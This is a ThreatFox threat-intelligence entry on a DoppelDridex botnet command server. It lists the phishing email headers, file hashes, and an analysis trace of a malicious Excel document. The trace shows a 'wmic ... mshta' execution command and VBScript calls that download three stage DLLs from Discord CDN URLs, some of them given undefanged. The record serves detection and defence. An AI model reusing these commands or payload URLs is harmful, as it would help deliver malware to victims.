ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 45.90.108.123:13786.

Database Entry

IOC ID: 233351
IOC: 45.90.108.123:13786
IOC Type: ip:port
Threat Type: botnet_cc
Malware: DoppelDridex
Confidence Level: high (100%)
First seen: 2021-10-13 15:28:42 UTC
Last seen: never
UUID: 3f3129bd-2c3a-11ec-a35f-42010aa4000a
Reporter: @AndreGironda
Reward: 5 credits from ThreatFox
Tags: 22202, DoppelDridex, Dridex, DridexLoader
Reference: https://tria.ge/211013-sh83paeea2

Twitter: @AndreGironda
MITRE ATT&CK: T1566.001
Date: Wed, 13 Oct 2021 14:30-15:00 +0000 (UTC)
Received: from ip-95-223-229-201.hsi16.unitymediagroup.de ([95.223.229.201]:54360 helo=[172.21.0.12])
MIME-Version: 1.0
Content-Type: multipart/mixed; charset="utf-8"; boundary="===============0883403505962461874=="
Content-Transfer-Encoding: base64
X-Mailer: Sendinblue
Content-Language: en-US
X-aid: 5.4 (13.10.2021 14:35:54)
Reply-To: ruddimanfinancial.com
Message-ID: <163413575407.32250.3305014212405205561@ruddimanfinancial.com>
From: Walter Ruddiman <walt@ruddimanfinancial.com>
Subject: Invoice#WIHS failed
Attachment Name: Payment_WIHS.xlsb
Maldoc excel40_hunter SHA256: c1061105c5a447dc394c3264769360d417ce48c49c4d02670580253f12a93335

wmic process call create 'mshta C:\ProgramData\FfIbKOVWpwA.rtf'

Unpacked VBScript File Name: FfIbKOVWpwA.rtf
VBScript VBA_Object SHA256: e3f9616043cbb094bc4b387eda1bcf7a6e7b1e4f4990a52c8770dad16b7333b8

CreateObject - params ['Wscript.Shell'] - Interesting Function Call
createobject - params ['MSXML2.XMLHTTP.6.0'] - Interesting Function Call
createobject - params ['Adodb.Stream'] - Interesting Function Call
qlQmoypY.Open - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822586963132416/2_kbd101c.dll', False] - Interesting Function Call
Object.Method Call - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822586963132416/2_kbd101c.dll', False] - qlQmoypY.Open
GET - params 'https://cdn.discordapp.com/attachments/897820678932275224/897822586963132416/2_kbd101c.dll' - Interesting Function Call
Object.Method Call - params ['User-Agent', 'syWugavr'] - qlQmoypY.setRequestHeader
Set HTTP Header - params "'User-Agent' ==> 'syWugavr'" - ServerXMLHTTP::SetRequestHeader()
createobject - params ['MSXML2.XMLHTTP.6.0'] - Interesting Function Call
createobject - params ['Adodb.Stream'] - Interesting Function Call
qlQmoypY.Open - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822593107771462/5_WfHC.dll', False] - Interesting Function Call
Object.Method Call - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822593107771462/5_WfHC.dll', False] - qlQmoypY.Open
GET - params 'https://cdn.discordapp.com/attachments/897820678932275224/897822593107771462/5_WfHC.dll' - Interesting Function Call
Object.Method Call - params ['User-Agent', 'syWugavr'] - qlQmoypY.setRequestHeader
Set HTTP Header - params "'User-Agent' ==> 'syWugavr'" - ServerXMLHTTP::SetRequestHeader()
createobject - params ['MSXML2.XMLHTTP.6.0'] - Interesting Function Call
createobject - params ['Adodb.Stream'] - Interesting Function Call
qlQmoypY.Open - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822596857483264/9_shlwapi.dll', False] - Interesting Function Call
Object.Method Call - params ['GET', 'https://cdn.discordapp.com/attachments/897820678932275224/897822596857483264/9_shlwapi.dll', False] - qlQmoypY.Open
GET - params 'https://cdn.discordapp.com/attachments/897820678932275224/897822596857483264/9_shlwapi.dll' - Interesting Function Call

Stage 1 URL: hXXps://cdn.discordapp[.]com/attachments/897820678932275224/897822586963132416/2_kbd101c.dll
Stage 2 URL: hXXps://cdn.discordapp[.]com/attachments/897820678932275224/897822593107771462/5_WfHC.dll
Stage 3 URL: hXXps://cdn.discordapp[.]com/attachments/897820678932275224/897822596857483264/9_shlwapi.dll
Stage 1 DLL SHA256: b8e4c68f8843fe8f2f12d5cc636c824a338ddaa24feee9e9e5e380169b07b231
Stage 2 DLL SHA256: 0d9a0d05c7ba4ae81904e64f66235e032ded422aa95de11b8a9691123f911885
Stage 3 DLL SHA256: 653aa17fbf6949e5bdba2599a9a3df4bb8ec259a5cf0eb7c3b08b6813c4283e7

Unpacked Dridex Executable SHA256: 0ea6ed1ee6298eb71fa135ab752fee0ea57d6d371de0c4d9970a44b2788f93af
Unpacked DoppelDridex DLL 1 SHA256: 417bdeeb9311bb71d7c3210ca72ca043e97369ce84ba6ff34de79c0d58a0db65
Unpacked DoppelDridex DLL 2 SHA256: f19f31f9ad39899254bfdd1f13d412ea69b20039649996271b17dc8de4c96a39
Unpacked DoppelDridex DLL 3 SHA256: 5a5a26b6b1c6fd568d0864c5364483e8645d5a884846b037979eb1a86d411ab2